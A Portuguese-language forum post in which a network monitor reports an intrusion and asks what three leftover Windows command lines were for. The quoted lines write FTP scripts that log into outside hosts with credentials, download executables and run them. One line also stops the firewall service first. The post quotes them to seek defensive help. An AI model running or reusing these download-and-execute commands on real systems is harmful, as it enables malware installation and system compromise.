saudações colaboradores do vol,
consegui detectar uma invasão em uma máquina da rede que ajudo a monitorar e peguei algumas linhas que o safado deixou no serviço de diretorios do outlook. gostaria de saber o que ele queria com esse script, alguem pode me ajudar!? por onde ele poder ter entrado?
mroot%system32cmd.execmd /c echo open 200.171.87.100 38705 >> ik &echo user niloz fucky0 >> ik &echo get 0.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &0.exe &exit
mroot%system32cmd.execmd /c net stop SharedAccess &echo open DivineFTP.snusk.nu 21 >> ij &echo user Gekko DSN654apoc >> ij &echo binary >> ij &echo get Gekko.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &Gekko.exe &net start SharedAccess &exit
mroot%system32cmd.execmd /c echo open 200.171.101.47 27607 >> ik &echo user niloz fucky0 >> ik &echo get 9.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &9.exe &exit
File Browser: Crie sua Nuvem Pessoal Privada
A produção de áudio e vídeo no Linux e as distribuições dedicadas a esse fim
Criptografando sua Home com Gocryptfs para tristeza do meliante
A Involução do Linux e as Lambanças Desnecessárias desde o seu Lançamento
O Journal no Linux para a guarda e consulta de logs do sistema
Gerenciamento de Vídeo Híbrido (Intel/NVIDIA) via nvidia-prime no Ubuntu e derivados
Assistindo IPTV no Linux com Fred TV e Lista Free TV
Impressora Tomate MDK-007 no Ubuntu (ou qualquer distro Linux)
Acelerando a compilação de pacotes no Arch Linux (AUR) usando todos os núcleos do processador
Tive um problema ao abrir minha partição Btrfs. Como posso resolver is... (1)
Enquete: qual bloco de código C++ é mais legível? (4)
Warsaw não é reconhecido no Google Chrome 147.0.7727.55 [RESOLVIDO] (11)









